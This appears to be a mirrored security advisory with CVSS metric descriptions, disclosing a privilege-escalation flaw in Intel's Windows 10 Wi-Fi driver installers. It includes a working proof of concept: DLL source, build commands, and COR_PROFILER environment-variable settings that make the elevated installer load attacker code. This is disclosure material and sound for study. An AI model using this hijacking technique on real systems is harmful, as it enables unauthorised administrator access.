The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Windows 10 Wi-Fi Drivers For Intel Wireless Adapters 22.30.0 Privilege Escalation
Hi @ll,
the executable installers version 22.30.0 (Latest), published 2/23/2021,
for the "Windows 10 Wi-Fi Drivers for Intel Wireless Adapters",
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>,
available from
<https://downloadcenter.intel.com/download/30208/Windows-10-Wi-Fi-Drivers-for-Intel-Wireless-Adapters>
are (SURPRISE!) vulnerable: they allow arbitrary code execution WITH
local escalation of privilege.
CVSS 3.0 score: 8.2 (High)
CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Demonstration:
~~~~~~~~~~~~~~
0. Log on with an arbitrary user account.
1. Save the following source as poc.c in an arbitrary directory:
--- poc.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <[email protected]>
#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
const STARTUPINFO si = {sizeof(si)};
__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE hModule,
DWORD dwReason,
CONTEXT *lpContext)
{
WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";
PROCESS_INFORMATION pi;
#if 0
if (dwReason != DLL_PROCESS_ATTACH)
return FALSE;
#endif
if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,
NULL, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
return TRUE;
}
--- EOF ---
2. Start the command prompt of the 32-bit Windows Software Development Kit,
then run the following command lines to compile poc.c and link it as
poc.dll:
CL.exe /Zl /W4 /Ox /GAFy /c poc.c
LINK.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /OPT:REF /RELEASE /SUBSYSTEM:Windows poc.obj
kernel32.lib
ALTERNATIVE for steps 1 and 2:
2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
and save it as poc.dll in an arbitrary directory.
See <https://skanthak.homepage.t-online.de/sentinel.html> for its
documentation, and
<https://insights.sei.cmu.edu/cert/2016/06/bypassing-application-whitelisting.html>
for an example how to use it.
3. Logon with the user account created during Windows setup.
4. Download
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>
and save them in an arbitrary directory.
5. Start a command prompt (UNELEVATED!) and run the following command lines
(replace <directory> with the pathname of the directory where you built
or saved poc.dll):
SETX.exe COR_ENABLE_PROFILING 1
SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
SETX.exe COR_PROFILER_PATH <directory>\poc.dll
JFTR: this is just one method to set these environment variables without
the need to elevate!
6. Execute WiFi_22.30.0_Driver32_Win10.exe and WiFi_22.30.0_Driver64_Win10.exe
per double-click, acknowledge the UAC prompt, then admire the console
windows showing the output of WHOAMI.exe running elevated.
stay tuned, and far away from Intel's vulnerable crap!
Stefan Kanthak
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum